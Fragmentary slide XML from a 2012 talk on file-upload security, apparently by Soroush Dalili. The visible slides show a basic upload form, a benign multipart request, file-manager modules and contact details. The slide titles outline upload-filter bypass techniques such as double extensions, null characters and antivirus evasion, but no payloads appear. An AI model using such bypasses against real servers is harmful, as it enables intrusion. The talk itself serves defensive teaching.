              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Managers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>include different modules:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create File/Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rename File/Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete File/Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move File/Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compress/Decompress Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image converting/resizing modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download/View File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse Files/Directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More functionality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Possibility of more vulnerability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4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 vectors cheat sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection methods cheat sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More OWASP ESAPI for file managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payloads to make the testing automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better checklists for Web Developers &amp; Webmasters.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7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time… - Yay! Fin4lly!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 algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any Question?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52936"/>
            <a:ext cx="4762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BIG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>hank you to everyone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>And, to the people who helped me to prepare this talk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>my contact details:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter: @IRSDL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email: IRSDL at Yahoo dot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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146" y="3883868"/>
            <a:ext cx="16573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Web Based File Upload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way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to put the files on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Increase business efficiency </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uses a simple web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sharing photos, videos, files, and so on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Being used in most of the modern websites:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Social Networks, Mail Systems, Shops, 	Content Management Systems, Forums, 	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8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Side File Upload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5191"/>
            <a:ext cx="864096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The most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>common: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Form-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Upload in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RFC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1867)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Post Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Content-Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>multipart/form-data</a:t>
            </a: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Others:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PUT HTTP Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ActiveX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java Applets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11887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8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 Upload – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple Form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93096"/>
            <a:ext cx="8352000" cy="2376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600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>="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post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>="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multipart/form-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>" action="upload.aspx"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>File Name: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;input type="submit" value="Upload" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>/form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0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4" y="1676153"/>
            <a:ext cx="8342313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7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Form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Client Sends…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1020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8872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>/samples/upload.aspx HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>Host: www.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>multipart/form-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AB12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0"/>
              <a:t>Content-Length: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0" smtClean="0"/>
              <a:t>133</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" dirty="0" smtClean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n-GB" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AB12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: form-data; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text/plain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Contents ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AB12</a:t>
            </a:r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</a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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6192338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RFC 1867</a:t>
            </a:r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8836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5575</TotalTime>
  <Words>2999</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>557</Paragraphs>
  <Slides>59</Slides>
  <Notes>17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Module</vt:lpstr>
      <vt:lpstr>File in the h   le!</vt:lpstr>
      <vt:lpstr>About Me – Soroush Dalili</vt:lpstr>
      <vt:lpstr>Topic: Security of File Uploaders</vt:lpstr>
      <vt:lpstr>Reported File Upload Vulnerabilities</vt:lpstr>
      <vt:lpstr>What can hackers do?</vt:lpstr>
      <vt:lpstr>Web Based File Upload</vt:lpstr>
      <vt:lpstr>Client Side File Upload Methods</vt:lpstr>
      <vt:lpstr>File Upload – Simple Form </vt:lpstr>
      <vt:lpstr>Simple Form - Client Sends…</vt:lpstr>
      <vt:lpstr>File Uploaders Vulnerabilities</vt:lpstr>
      <vt:lpstr>Improper Or No Access Control</vt:lpstr>
      <vt:lpstr>Real Example: Access Control</vt:lpstr>
      <vt:lpstr>Arbitrary (Unrestricted) File Upload</vt:lpstr>
      <vt:lpstr>Real Example: Arbitrary (Unrestricted) File Upload</vt:lpstr>
      <vt:lpstr>Overwriting Sensitive Files</vt:lpstr>
      <vt:lpstr>Real Example: Overwriting Sensitive Files </vt:lpstr>
      <vt:lpstr>Path Disclosure</vt:lpstr>
      <vt:lpstr>Real Example: Path Disclosure</vt:lpstr>
      <vt:lpstr>Tip: Create a Folder by File Upload!</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>…Directory Traversal</vt:lpstr>
      <vt:lpstr>Real Example: Directory Traversal</vt:lpstr>
      <vt:lpstr>Insecure Temporary File</vt:lpstr>
      <vt:lpstr>Real Example: Insecure Temp File</vt:lpstr>
      <vt:lpstr>Other Vulnerabilities</vt:lpstr>
      <vt:lpstr>Protection Methods</vt:lpstr>
      <vt:lpstr>Common Protection Methods</vt:lpstr>
      <vt:lpstr>Bypassing Firewalls: Intro</vt:lpstr>
      <vt:lpstr>Bypassing Web Server Configs.</vt:lpstr>
      <vt:lpstr>Bypassing FS Permissions</vt:lpstr>
      <vt:lpstr>Bypassing Antivirus Application</vt:lpstr>
      <vt:lpstr>Storing Data on Another Domain</vt:lpstr>
      <vt:lpstr>Content-Type Protection Issues</vt:lpstr>
      <vt:lpstr>Real Example: Content-Type Bypass</vt:lpstr>
      <vt:lpstr>Name and Extension Issues</vt:lpstr>
      <vt:lpstr>1- Missed Extensions – Got u! </vt:lpstr>
      <vt:lpstr>2- Double Extensions – Featur3s!</vt:lpstr>
      <vt:lpstr>3- Case Sensitive Rules? – Easy on3!</vt:lpstr>
      <vt:lpstr>4- Windows 8.3 – I &lt;3 Featur3s  </vt:lpstr>
      <vt:lpstr>5- Windows File System – Oh, OK!</vt:lpstr>
      <vt:lpstr>6- Null Character – S3cr3t Warr1or!</vt:lpstr>
      <vt:lpstr>File Type Detector Issues</vt:lpstr>
      <vt:lpstr>Content Format Issues</vt:lpstr>
      <vt:lpstr>Compression (Image) Issues</vt:lpstr>
      <vt:lpstr>GZIP Compression  PHP Code</vt:lpstr>
      <vt:lpstr>Name Randomization Issues</vt:lpstr>
      <vt:lpstr>Out of Web Folder Issues</vt:lpstr>
      <vt:lpstr>Files In the Database Issues</vt:lpstr>
      <vt:lpstr>Logical/Programming Flaws!</vt:lpstr>
      <vt:lpstr>Other Interesting Vectors Examples</vt:lpstr>
      <vt:lpstr>w3Schools Example is vulnerable!</vt:lpstr>
      <vt:lpstr>w3Schools Example is vulnerable!</vt:lpstr>
      <vt:lpstr>FCKEditor 2.6.8 File Upload Issue</vt:lpstr>
      <vt:lpstr>CKFinder/FCKEditor DoS Issue</vt:lpstr>
      <vt:lpstr>Quick checklist…</vt:lpstr>
      <vt:lpstr>File Managers Modules</vt:lpstr>
      <vt:lpstr>Future Works…</vt:lpstr>
      <vt:lpstr>Question time… - Yay! Fin4lly!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 in the hole!</dc:title>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>777</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-11T22:30:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-27T21:04:40Z</dcterms:modified>
</cp:coreProperties>
</file>